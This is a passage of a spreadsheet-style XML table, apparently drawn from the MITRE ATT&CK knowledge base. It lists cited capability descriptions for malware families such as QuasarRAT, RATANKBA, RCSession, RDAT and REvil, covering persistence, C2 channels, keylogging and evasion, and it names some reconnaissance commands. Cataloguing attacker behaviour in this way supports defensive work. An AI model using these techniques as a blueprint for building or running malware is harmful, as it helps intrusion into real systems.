    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.(Citation: Volexity Patchwork June 2018)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--f120a700-dcac-4c8d-8e92-d6ba3491c2ba</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) uses AES with a hardcoded pre-shared key to encrypt network communication.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--2f3ff7c9-ea14-45ad-b295-6f2f3c40cff7</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can gather system information from the victim’s machine including the OS type.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>relationship--48281b5d-ca6f-401e-bda1-24f6537dcf1d</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can determine the country a victim host is located in.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--4f4a052a-7e53-451f-8976-7c6f1623102d</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</si>
  <si>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</si>
  <si>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relationship--9adf592e-f74c-46ed-95ae-85f8c45b0d5e</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can enumerate the username and account type.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--605478eb-c1c2-4029-bf36-9cc8981f2bee</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can perform webcam viewing.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--f3c0c3c1-e7a9-46ae-94cf-e128120a7c5f</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can launch a remote shell to execute commands on the victim’s machine.(Citation: GitHub QuasarRAT)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>relationship--b1bd60cf-f120-4ed1-b891-0ae3fab2a725</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can collect files from a compromised host.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--b2425d69-e91c-493a-aa66-598aa3d5c7f4</t>
  </si>
  <si>
    <t xml:space="preserve">[QuietSieve](https://attack.mitre.org/software/S0686) can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z.(Citation: Microsoft Actinium February 2022) </t>
  </si>
  <si>
    <t>relationship--8f389f41-9588-4a67-a186-c25bef45e4cc</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) has the ability to execute payloads in a hidden window.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--0ac2c282-04a7-4fb7-b6ac-ec8a9bac6db1</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can download and execute payloads on a target host.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--16446d10-cf55-4e1e-bbf8-7ce6b8a2fb2b</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--5b4a0fe7-5fcc-4f74-8914-2d4bc25b9d02</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can identify and search networked drives for specific file name extensions.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--f728406e-2862-4eca-be0e-2835255a49cd</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can identify and search removable drives for specific file name extensions.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--adc3fbb4-955e-4861-ac19-4c2b546d562d</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\SymbolSourceSymbols\icons` or `Temp\ModeAuto\icons`.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--f7e3c06d-61a2-4008-89af-4380e7d71ced</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can use HTTPS in C2 communications.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--142307da-c957-49ff-985f-9dd503c8626b</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</si>
  <si>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</si>
  <si>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relationship--22a75bbf-5490-40cb-bdb7-a0eda5e95d21</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>relationship--35ec37ba-44aa-49b1-9379-3f6070554c62</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) downloads its backdoor component from a C2 server and loads it directly into memory.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>relationship--4bf364ad-1e9c-4860-93c0-241da4c81068</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) uses SSL to encrypt its communication with its C2 server.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>relationship--345c6135-7557-4292-8214-66618ba17edd</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) performs a reflective DLL injection using a given pid.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--65eff720-b419-4e73-8f6c-c3dd07b78484</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uploads and downloads information.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--d8d6740b-a359-4f5c-b7d4-2189eea77892</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--7d181964-875f-4132-8882-46e9dd18e893</t>
  </si>
  <si>
    <t>There is a variant of [RATANKBA](https://attack.mitre.org/software/S0241) that uses a PowerShell script instead of the traditional PE form.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--ed91791b-8e5a-4e0c-b77c-6fad78be7378</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) lists the system’s processes.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--87e7c117-bf53-432e-9ff3-2aeb2e522231</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the command &lt;code&gt;reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”&lt;/code&gt;.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--bca618ac-7867-4dc4-b683-ae3f61addc68</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;net view /domain&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--9dfdcec6-82b7-42a4-902a-3220f4d67bcf</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers information about the OS architecture, OS name, and OS version/Service pack.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--f3e4b47e-cde3-4f27-85b7-464b02325ee6</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers the victim’s IP address via the &lt;code&gt;ipconfig -all&lt;/code&gt; command.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--8dd3bed4-1e3c-4a08-9181-669b5ca03075</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;netstat -ano&lt;/code&gt; to search for specific IP address ranges.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--3018ef54-d98c-4958-bc31-dc6b45b67a05</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--28ffc627-936b-4572-93f6-0c46cb361dda</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;tasklist /svc&lt;/code&gt; to display running tasks.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--43886571-4415-484f-931b-3b30b9aefaa7</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses HTTP/HTTPS for command and control communication.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--56b6c694-6d04-4799-9a34-b4c66f25b30e</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses cmd.exe to execute commands.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--337abaa3-80a6-4c41-9936-2eed13b84ba9</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses WMI to perform process monitoring.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>relationship--6ed1086d-3197-403e-86e4-16e4dee07faa</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can bypass UAC to escalate privileges.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--fcc98412-8534-42d7-873a-6f8a26721e27</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can be installed via DLL side-loading.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--f0e2c414-9356-4eb6-89d5-fe1afb62780f</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can collect data from a compromised host.(Citation: Profero APT27 December 2020)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--c5a8316e-f45c-432d-beb3-d8de4785dba3</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use an encrypted beacon to check in with C2.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--0a47636e-8260-414d-aff7-7b1120778a51</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can remove files from a targeted system.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--a31c95e7-5c2f-47ff-9b3a-30ddb0fa63b5</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can store its obfuscated configuration file in the Registry under `HKLM\SOFTWARE\Plus` or `HKCU\SOFTWARE\Plus`.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--d8f956ea-84ef-4232-b281-59c40f019753</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to drop additional files to an infected machine.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--6758c87e-d187-46df-b02a-1e093b3054cc</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to capture keystrokes on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--64fc52d7-7e49-4fda-8193-8e38e8ac1811</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has used a file named English.rtf to appear benign on victim hosts.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--ea99ff52-af1e-49af-9cfe-b224c9a9eea4</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can write its configuration file to the Registry.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--ec72af45-d362-41c1-99d1-7a225a823049</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to execute inside the msiexec.exe process.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--2e03c99d-473d-406e-b903-1fc9c9a6a5ec</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use WinSock API for communication including &lt;code&gt;WSASend&lt;/code&gt; and &lt;code&gt;WSARecv&lt;/code&gt;.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--7908bc8d-8a9b-48c0-897e-25266950b0da</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to use TCP and UDP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--cbe08a78-7997-4aef-9b29-b4b002accbc3</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can compress and obfuscate its strings to evade detection on a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--b31e0e76-0239-41fc-a9a8-7c62b00510e1</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can identify processes based on PID.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--2a47008b-49af-4ecc-b018-ef92786ead72</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can launch itself from a hollowed svchost.exe process.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--1bd9ad06-bb44-423c-b670-65b8a8510e1e</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) has the ability to modify a Registry Run key to establish persistence.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--ab1d783b-d6b3-439c-a5f4-701a8cae4c6a</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can capture screenshots from a compromised host.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--4ea07638-aca6-400b-9979-26b9002e990c</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can gather system information from a compromised host.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--d7e5009a-1eb3-4b74-ad0c-53ba0e151935</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can gather system owner information, including user and administrator privileges.(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--89baa1ed-a6f9-4da6-9448-c74d8f8a638b</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use HTTP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--7eb1887a-2a3e-46f0-83c5-fe931c3a163b</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) can use `cmd.exe` for execution on compromised hosts.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--fb63284b-33d6-4cf9-afdb-2aed117af00f</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has used DNS to communicate with the C2.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--3d70f1d9-366a-4510-91f6-fe15ca06d7a8</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--dd4423f6-b526-4856-aa00-2c4aa36617da</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</si>
  <si>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</si>
  <si>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relationship--a901b584-c676-4419-9357-943de685114e</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--63b6fd1d-65a7-4c94-8045-16fd198802f1</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--cfff835f-4c2b-4c90-b316-3807796269fc</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has used HTTP if DNS C2 communications were not functioning.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--d96db78c-e7b8-4877-8187-07c5e801cead</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can issue SOAP requests to delete already processed C2 emails. [RDAT](https://attack.mitre.org/software/S0495) can also delete itself from the infected system.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--b4445491-4549-4333-b6b8-034ab4932295</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can download files via DNS.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--abca8fe1-0303-43a8-b469-a7921358a3f1</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use email attachments for C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--804fb819-6b91-4295-aec9-b9299fb3472b</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used Windows Video Service as a name for malicious services.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--240ba2e0-c718-4327-a6a6-cb35d6145c35</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has masqueraded as VMware.exe.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--4899bf68-d60e-4132-a962-faafd35f0c4a</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via subdomains that utilize base64 with character substitutions.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--5ef6ff08-0567-4366-a1df-13184c460cc4</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can take a screenshot on the infected system.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--49d50fde-cfbc-4007-befc-f4b22b9bc9f5</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via base32-encoded subdomains.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--4de4cf78-542c-4f7a-a83b-f876a59e2553</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) can also embed data within a BMP image prior to exfiltration.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--15698fb0-12df-4135-8ecb-093e9fd268a2</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</si>
  <si>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</si>
  <si>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relationship--a760c63f-6459-430d-88ce-291513c47d11</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used AES ciphertext to encode C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--78665233-dd3d-4a86-981f-4342e4e0cbee</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--00f4c60b-36c4-4ec5-affd-38f89687d957</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has executed commands using &lt;code&gt;cmd.exe /c&lt;/code&gt;.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--34810a1f-a9bd-4f1b-bbdc-4e8c4ec1ef21</t>
  </si>
  <si>
    <t xml:space="preserve">[RDAT](https://attack.mitre.org/software/S0495) has created a service when it is installed on the victim machine.(Citation: Unit42 RDAT July 2020)	</t>
  </si>
  <si>
    <t>relationship--61ce8307-ddb8-4f29-ab77-6532c2b90266</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) hooks several Win32 API functions to hijack elements of the remote system management user-interface.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--71a3a771-3674-4b44-8742-bed627f178b3</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has the capability of deleting local files.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--81d5c85f-ea7c-47a2-879c-df34e93d88c2</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has used several Win32 API functions to interact with the victim machine.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--bcd66737-6beb-4cf8-9ba1-8a32731d1da1</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has encrypted C2 communications with the ECIES algorithm.(Citation: Kaspersky Sodin July 2019)</t>
  </si>
  <si>
    <t>relationship--26dcd489-5bd7-4f33-a920-79535c42082c</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can launch an instance of itself with administrative rights using runas.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--6b965d3a-130d-4502-963b-111258897615</t>
  </si>
  <si>
    <t>05 August 2020</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</si>
  <si>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</si>
  <si>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relationship--31bf8ae4-e757-462c-aa30-c4a9dd92c677</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</si>
  <si>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</si>
  <si>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relationship--1c30f3e0-f621-4e59-934d-f4091cb9eca5</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</si>
  <si>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</si>
  <si>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relationship--a0ff37b8-1a73-45dd-a645-fe2a43fad9f6</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can connect to and disable the Symantec server on the victim's network.(Citation: Cylance Sodinokibi July 2019)</t>
  </si>
  <si>
    <t>relationship--221d9c96-0042-4354-8475-4cc7d0437254</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can identify the domain membership of a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--d57826cf-0fbd-44e5-9d67-9f29a93f1ca6</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</si>
  <si>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</si>
  <si>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relationship--91ec91fa-f468-47fa-a931-aeb9b4f74ba3</t>
  </si>
  <si>
    <t>06 August 2020</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can exfiltrate host and malware information to C2 servers.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--4f32ce54-46cf-4141-9700-9978056951db</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mark its binary code for deletion after reboot.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>relationship--e73e1a22-4923-404b-b2f2-5131f8f24e64</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</si>
  <si>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</si>
  <si>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relationship--74972bfd-6910-4602-8327-5cc6db07e48a</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</si>
  <si>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</si>
  <si>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relationship--f292f16f-ab6e-42ef-94f5-d65792fe5df8</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can download a copy of itself from an attacker controlled IP address to the victim machine.(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>relationship--a910e0f8-1548-4dd6-a0eb-19430a5f75b0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</si>
  <si>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</si>
  <si>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relationship--e8924eab-e270-43ed-8d7b-8e14cb739720</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has been executed via malicious MS Word e-mail attachments.(Citation: G Data Sodinokibi June 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>relationship--639bd473-be74-4ddb-bfc1-eaa2574df975</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can mimic the names of known executables.(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>relationship--2c8a4c1a-0faf-444d-a6b2-556c55374fa2</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</si>
  <si>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</si>
  <si>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relationship--2c927351-d98a-4734-83db-82ad3231e59f</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use Native API for execution and to retrieve active services.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>relationship--63131350-3239-4272-a155-5d50e174b1e3</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</si>
  <si>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</si>
  <si>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relationship--8b12a0c5-9e30-47ef-a786-5c5eeaf52240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</si>
  <si>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</si>
  <si>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relationship--23bd8751-1083-4c0b-8ec1-b5f637c5fbc7</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can inject itself into running processes on a compromised host.(Citation: McAfee REvil October 2019)</t>
  </si>
  <si>
    <t>relationship--2c66270f-e6eb-4f0b-9006-9be7fcc9ba3a</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can query the Registry to get random file extensions to append to encrypted files.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--3a50e0b3-fe35-4cfe-bdd6-306946b15abc</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can force a reboot in safe mode with networking.(Citation: BleepingComputer REvil 2021)</t>
  </si>
  <si>
    <t>relationship--0992eecd-111f-4b22-b016-b74f07c8d817</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to stop services and kill processes.(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>relationship--50900340-6edc-447c-aa1c-f73f5d72e4c6</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</si>
  <si>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</si>
  <si>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relationship--a65fd9d5-0802-44ca-9d8b-025a62455faf</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</si>
  <si>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</si>
  <si>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relationship--598d55da-c5f9-447c-acad-0c611f1deda0</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</si>
  <si>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</si>
  <si>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relationship--b6bce22a-7318-483d-a7dc-0edf32814ee5</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can enumerate active services.(Citation: Intel 471 REvil March 2020)</t>
  </si>
  <si>
    <t>relationship--965cdcbc-f139-4065-a8cd-ab09674ae20b</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.(Citation: McAfee Sodinokibi October 2019)</t>
  </si>
  <si>
    <t>relationship--bab712d9-69d6-49d0-b063-8f957f3ea222</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has used obfuscated VBA macros for execution.(Citation: G Data Sodinokibi June 2019)(Citation: Picus Sodinokibi January 2020)</t>
  </si>
  <si>
    <t>relationship--49dcbb09-c4d8-4ade-8429-94afe0b9747b</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</si>
  <si>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</si>
  <si>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relationship--bb231cc6-fa7f-411f-9ec8-392572474e57</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</si>
  <si>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</si>
  <si>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relationship--1caa0b51-4e91-4c1b-bec5-53592ab9d08a</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use WMI to monitor for and kill specific processes listed in its configuration file.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>relationship--9e80392b-1b7c-4e82-9fbf-73d8ddb6b876</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) encrypts files with XOR before sending them back to the C2 server.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--40e636e8-a891-46fb-ba04-69db00062354</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) decodes Base64 strings and decrypts strings using a custom XOR algorithm.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--d4240d9a-1499-4863-a654-a52a1dbf48b4</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) establishes persistence on webservers as an IIS module.(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>relationship--2c0b0d7b-239c-4514-9f32-1abb8aa44dbc</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uploads and downloads files to and from the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ee03d4e8-79e5-408f-a533-462774da46ed</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) executes the &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--ada55a0e-2f38-4da1-9ebd-8dd2f2461dfc</t>
  </si>
  <si>
